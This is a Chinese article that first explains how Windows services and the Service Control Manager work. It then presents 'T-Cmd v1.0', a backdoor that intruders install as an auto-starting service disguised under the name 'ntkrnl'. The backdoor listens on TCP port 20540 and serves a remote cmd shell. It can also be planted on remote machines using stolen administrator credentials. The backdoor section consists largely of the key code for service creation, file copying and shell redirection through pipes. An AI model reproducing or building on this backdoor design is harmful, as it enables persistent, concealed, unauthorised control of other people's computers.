Windows下的服务程序都遵循服务控制管理器(SCM)的接口标准，它们会在登

录系统时自动运行，甚至在没有用户登录系统的情况下也会正常执行，类似与UN

IX系统中的守护进程(daemon)。它们大多是控制台程序，不过也有少数的GUI程

序。本文所涉及到的服务程序仅限于Windows2000/XP系统中的一般服务程序，不

包含Windows9X。

　二、Windows服务简介

　　服务控制管理器拥有一个在注册表中记录的数据库，包含了所有已安装的服

务程序和设备驱动服务程序的相关信息。它允许系统管理员为每个服务自定义安

全要求和控制访问权限。Windows服务包括四大部分：服务控制管理器(Service

Control Manager)，服务控制程序(Service Control

Program)，服务程序(Service Program)和服务配置程序(Service

Configuration Program)。

　　1.服务控制管理器(SCM)

　　服务控制管理器在系统启动的早期由Winlogon进程启动，可执行文件名是“

Admin$/System32/Services.exe”，它是系统中的一个RPC服务器，因此服务配

置程序和服务控制程序可以在远程操纵服务。它包括以下几方面的信息：

　　已安装服务数据库：服务控制管理器在注册表中拥有一个已安装服务的数据

库，它在服务控制管理器和程序添加，删除，配置服务程序时使用，在注册表中

数据库的位置为：HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services。

它包括很多子键，每个子键的名字就代表一个对应的服务。数据库中包括：服务

类型(私有进程，共享进程)，启动类型(自动运行，由服务控制管理器启动，无

效)，错误类型(忽略，常规错误，服务错误，关键错误)，执行文件路径，依赖

信息选项，可选用户名与密码。

　　自动启动服务：系统启动时，服务控制管理器启动所有“自启”服务和相关

依赖服务。服务的加载顺序：顺序装载组列表：

　　HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/ServiceGroupOr

der；指定组列表：　　　　 
　　HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/GroupOrderList

；每个服务所依赖的服务程序。

　　在系统成功引导后会保留一份LKG(Last-Know-Good)的配置信息位于：

　　HKEY_LOCAL_MACHINE/SYSTEM/ControlSetXXX/Services。

　　因要求而启动服务：用户可以使用服务控制面板程序来启动一项服务。服务

控制程序也可以使用StartService来启动服务。服务控制管理器会进行下面的操

作：获取帐户信息，登录服务项目，创建服务为悬挂状态，分配登录令牌给进程

，允许进程执行。

　　服务记录列表：每项服务在数据库中都包含了下面的内容：服务名称，开始

类型，服务状态(类型，当前状态，接受控制代码，退出代码，等待提示)，依赖

服务列表指针。

　　服务控制管理器句柄：服务控制管理器支持句柄类型访问以下对象：已安装

服务数据库，服务程序，数据库的锁开状态。

　　2.服务控制程序(SCP)

　　服务控制程序可以执行对服务程序的开启，控制和状态查询功能：

　　开启服务：如果服务的开启类型为SERVICE_DEMAND_START，就可以用服务控

制程序来开始一项服务。在开始服务的初始化阶段服务的当前状态为：SERVICE_

START_PENDING，而在初始化完成后的状态就是：SERVICE_RUNNING。

　　向正在运行的服务发送控制请求：控制请求可以是系统默认的，也可以是用

户自定义的。标准控制代码如下：停止服务(SERVICE_CONTROL_STOP)，暂停服务

(SERVICE_CONTROL_PAUSE)，恢复已暂停服务(SERVICE_CONTROL_CONTINUE),获得

更新信息(SERVICE_CONTROL_INTERROGATE)。

　　3.服务程序

　　一个服务程序可能拥有一个或多个服务的执行代码。我们可以创建类型为SE

RVICE_WIN32_OWN_PROCESS的只拥有一个服务的服务程序。而类型为SERVICE_WIN

32_SHARE_PROCESS的服务程序却可以包含多个服务的执行代码。详情参见后面的

Windows服务与编程。

4.服务配置程序

　　编程人员和系统管理员可以使用服务配置程序来更改，查询已安装服务的信

息。当然也可以通过注册表函数来访问相关资源。

　　服务的安装，删除和列举：我们可以使用相关的系统函数来创建，删除服务

和查询所有服务的当前状态。

　　服务配置：系统管理员通过服务配置程序来控制服务的启动类型，显示名称

和相关描述信息。  
　三、Windows服务与编程

　　Windows服务编程包括几方面的内容，下面我们将从服务控制程序，服务程

序和服务配置程序的角度介绍服务编程相关的内容。

　　1.服务控制程序

　　执行服务控制程序的相关函数前，我们需要获得一个服务对象的句柄，方式

有两种：由OpenSCManager来获得一台特定主机的服务控制管理器数据库的句柄

；使用OpenService或CreateService函数来获得某个服务对象的句柄。

　　启动服务：要启动一个服务，服务控制程序可以使用StartService来实现。

如果服务控制管理器数据库被锁定，那需要等待一定的时间然后再次测试StartS

ervice函数。当然也可以使用QueryServiceLockStatus函数来确认数据库的当前

状态。在启动成功完成时，那么dwCurrentState参数将会返回SERVICE_RUNNING

值。

　　服务控制请求：服务控制程序使用ControlService函数来发送控制请求到正

在运行的服务程序。它会向控制句柄函数发送一个特定的控制命令，可以是系统

默认的，也可以是用户自定义的。而且每个服务都会确定自己将会接收的控制命

令列表。使用QueryServiceStatus函数时，在返回的dwControlsAccepted参数中

表明服务程序将会接收的控制命令。所有的服务都会接受SERVICE_CONTROL_INTE

RROGATE命令。

　　2.服务程序

　　一个服务程序内可以包含一个服务或多个服务的执行代码，但是它们都拥有

固定的三个部分：服务main函数，服务ServiceMain函数和服务Control Handler

函数。

　　服务main函数：服务程序通常是以控制台的方式存在的，所以它们的入口点

都是main函数。在服务控制管理器开始一个服务程序时，会等待StartServiceCt

rlDispatcher函数的执行。如果服务类型是SERVICE_WIN32_OWN_PROCESS就会立

即调用StartServiceCtrlDispatcher函数的执行；如果服务类型是SERVICE_WIN3

2_SHARE_PROCESS，通常在初始化所有服务之后再调用它。StartServiceCtrlDis

patcher函数的参数就是一个SERVICE_TABLE_ENTRY结构，它包含了进程内所有服

务的名称和服务入口点。

　　服务ServiceMain函数：函数ServiceMain是服务的入口点。在服务控制程序

请求一个新的服务启动时，服务控制管理器启动一个服务，并发送一个开始请求

到控制调度程序，而后控制调度程序创建一个新线程来执行ServiceMain函数。S

erviceMain须执行以下的任务：调用RegisterServiceCtrlHandler函数注册一个

HandlerEx函数来向服务发送控制请求信息，返回值是服务状态句柄用来向服务

控制管理器传送服务状态。初始化后调用SetServiceStatus函数设置服务状态为

SERVICE_RUNNING。最后，就是执行服务所要完成的任务。

　　服务Control Handler函数：每个服务都有一个控制句柄HandlerEx函数。它

会在服务进程从服务控制程序接收到一个控制请求时被控制调度程序所调用。无

论何时在HandlerEx函数被调用时，都要调用SetServiceStatus函数向服务控制

管理器报告它当前的状态。在用户关闭系统时，所有的控制句柄都会调用带有SE

RVICE_ACCEPT_SHUTDOW控制代码的SetServiceStatus函数来接收NSERVICE_CONTR

OL_SHUTDOWN控制代码。

　　3.服务配置程序

　　服务配置程序可以更改或查询服务的当前配置信息。在调用服务配置函数之

前，必须获得一个服务对象的句柄，当然我们可以通过调用OpenSCManager,Open

Service或CreateService函数来获得。

　　创建，删除服务：服务配置程序使用CreateService函数在服务控制管理器

的数据库中安装一个新服务，它会提供服务的名称和相关的配置信息并存储在数

据库中。服务配置程序则使用DeleteService函数从数据库中删除一个已经安装

的服务。

　　四、服务级后门技术

　　在你进入某个系统后，往往会为自己留下一个或多个后门，以便今后的访问

。在上传一个后门程序到远程系统上后系统重启之时，总是希望后门仍然存在。

那么，将后门程序创建成服务程序应该是个不错的想法，这就是利用了服务程序

自动运行的机制，当然在Windows2000的任务管理器里也很难结束一个服务程序

的进程。

　　创建一个后门，它常常会在一个端口监听，以方便我们使用TCP/UDP协议与

远程主机建立连接，所以我们首先需要在后门程序里创建一个监听的端口，为了

数据传输的稳定与安全，我们可以使用TCP协议。

　　那么，我们如何才能模拟一个Telnet服务似的后门呢？我想大家都清楚，如

果在远程主机上有一个Cmd是我们可以控制的，也就是我们可以在这个Cmd里执行

命令，那么就可以实现对远程主机的控制了，至少可以执行各种常规的系统命令

。启动一个Cmd程序的方法很多，有WinExec,ShellExecute,CreateProcess等，

但只能使用CreateProcess，因为WinExec和ShellExecute它们实在太简单了。在

使用CreateProcess时，要用到它的重定向标准输入/输出的选项功能，把在本地

主机的输入重定向输入到远程主机的Cmd进程，并且把远程主机Cmd进程的标准输

出重定向到本地主机的标准输出。这就需要在后门程序里使用CreatePipe创建两

个管道来实现进程间的数据通信(Inter-Process Communication，IPC)。当然，

还必须将远程主机上Cmd的标准输入和输出在本地主机之间进行传送，我们选择T

CP协议的send和recv函数。在客户结束访问后，还要调用TerminateProcess来结

束创建的Cmd进程。

　　五、关键函数分析

　　本文相关程序T-Cmd

v1.0是一个服务级的后门程序，适用平台为Windows2000/XP。它可自动为远程/

本地主机创建服务级后门，无须使用任何额外的命令，支持本地/远程模式。重

启后，程序仍然自动运行，监听端口20540/tcp。

　　1.自定义数据结构与函数

typedef struct  
{  
HANDLE hPipe;  
//为实现进程间通信而使用的管道；  
SOCKET sClient;  
//与客户端进行通信时的客户端套接字；  
}SESSIONDATA,*PSESSIONDATA;  
//重定向Cmd标准输入/输出时使用的数据结构；

typedef struct PROCESSDATA  
{  
HANDLE hProcess;  
//创建Cmd进程时获得的进程句柄；  
DWORD dwProcessId;  
//创建Cmd进程时获得的进程标识符；  
struct PROCESSDATA *next;  
//指向下一个数据结构的指针；  
}PROCESSDATA,*PPROCESSDATA;  
//在客户结束访问或删除服务时为关闭所以的Cmd进程而创建的数据结构；

void WINAPI CmdStart(DWORD,LPTSTR *);  
//服务程序中的“ServiceMain”：注册服务控制句柄，创建服务主线程；  
void WINAPI CmdControl(DWORD);  
//服务程序中的“HandlerEx”：处理接收到的控制命令，删除已创建的Cmd进程

；  
DWORD WINAPI CmdService(LPVOID);  
//服务主线程，创建服务监听端口，在接受客户连接时，创建重定向Cmd标准输

入/输出线程；  
DWORD WINAPI CmdShell(LPVOID);  
//创建管道与Cmd进程，及Cmd的输入/输出线程；  
DWORD WINAPI ReadShell(LPVOID);  
//重定向Cmd的输出，读取信息后发送到客户端；  
DWORD WINAPI WriteShell(LPVOID);  
//重定向Cmd的输入，接收客户端的信息输入到Cmd进程；  
BOOL ConnectRemote(BOOL,char *,char *,char *);  
//如果选择远程模式，则须与远程主机建立连接，注须提供管理员权限的用户名

与密码，密码为空时用"NULL"代替；  
void InstallCmdService(char *);  
//复制传送文件，打开服务控制管理器，创建或打开服务程序；  
void RemoveCmdService(char *);  
//删除文件，停止服务后，卸载服务程序；

　　2.服务程序相关函数

SERVICE_TABLE_ENTRY DispatchTable[] =  
{  
{"ntkrnl",CmdStart},  
//服务程序的名称和入口点；  
{NULL ,NULL }  
//SERVICE_TABLE_ENTRY结构必须以“NULL”结束；  
};  
StartServiceCtrlDispatcher(DispatchTable);  
//连接服务控制管理器，开始控制调度程序线程；  
ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);  
//注册CmdControl函数为“HandlerEx”函数，并初始化；  
ServiceStatus.dwCurrentState = SERVICE_RUNNING;  
SetServiceStatus(ServiceStatusHandle,&ServiceStatus)；  
//设置服务的当前状态为SERVICE_RUNNING；  
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);  
//创建服务主线程，实现后门功能；  
WaitForSingleObject(hMutex,INFINITE);  
//等待互斥量，控制全局变量的同步使用；  
TerminateProcess(lpProcessDataHead->hProcess,1);  
//终止创建的Cmd进程；  
hSearch=FindFirstFile(lpImagePath,&FileData);  
//查找系统目录下服务程序的文件是否已经存在；  
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);  
//获得当前进程的程序文件名；  
CopyFile(lpCurrentPath,lpImagePath,FALSE);  
//复制文件到系统目录下；  
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);  
//打开服务控制管理器数据库；  
CreateService(schSCManager,"ntkrnl","ntkrnl", 
　SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERV

ICE_ERROR_IGNORE, 
　"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);  
//创建服务，参数包括名称，服务类型，开始类型，错误类型及文件路径等；  
schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);  
//如果服务已经创建，则打开服务；  
StartService(schService,0,NULL);  
//启动服务进程；  
ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus);  
//控制服务状态；  
DeleteService(schService);  
//卸载服务程序；  
DeleteFile(lpImagePath);  
//删除文件；

　　3.后门程序相关函数

hMutex=CreateMutex(NULL,FALSE,NULL);  
//创建互斥量；  
hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);  
//创建处理客户端访问的重定向输入输出线程；  
CreatePipe(&hReadPipe,&hReadShell,&saPipe,0);  
CreatePipe(&hWriteShell,&hWritePipe,&saPipe,0);  
//创建用于进程间通信的输入/输出管道；  
CreateProcess(lpImagePath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&lpStartupIn

fo,&lpProcessInfo);  
//创建经重定向输入输出的Cmd进程；  
hThread[1]=CreateThread(NULL,0,ReadShell,(LPVOID*)&sdRead,0,&dwSendThr

eadId);  
hThread[2]=CreateThread(NULL,0,WriteShell,(LPVOID

*)&sdWrite,0,&dwReavThreadId);  
//创建处理Cmd输入输出的线程；  
dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE);  
//等待线程或进程的结束；  
ReleaseMutex(hMutex);  
//释放互斥量；  
PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NUL

L);  
//从管道中复制数据到缓冲区中，但不从管道中移出；  
ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);  
//从管道中复制数据到缓冲区中；  
WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten

,NULL);  
//向管道中写入从客户端接收到的数据；  
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONN

ECT_INTERACTIVE);  
//与远程主机建立连接；  
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);  
//与远程主机结束连接；   
　　六、附录

　　1.SC简介

　　SC是一个与NT服务控制器，服务进程进行通信的控制台程序，它可以查询和

修改已安装服务的数据库。

　　语法：sc <server> [command] [service name] <option1> <option2>...

，选项<server>为“//ServerName”的形式。

　　主要的命令包括：query,config,qc,delete,create,GetDisplayName,GetKe

yName,EnumDepend等。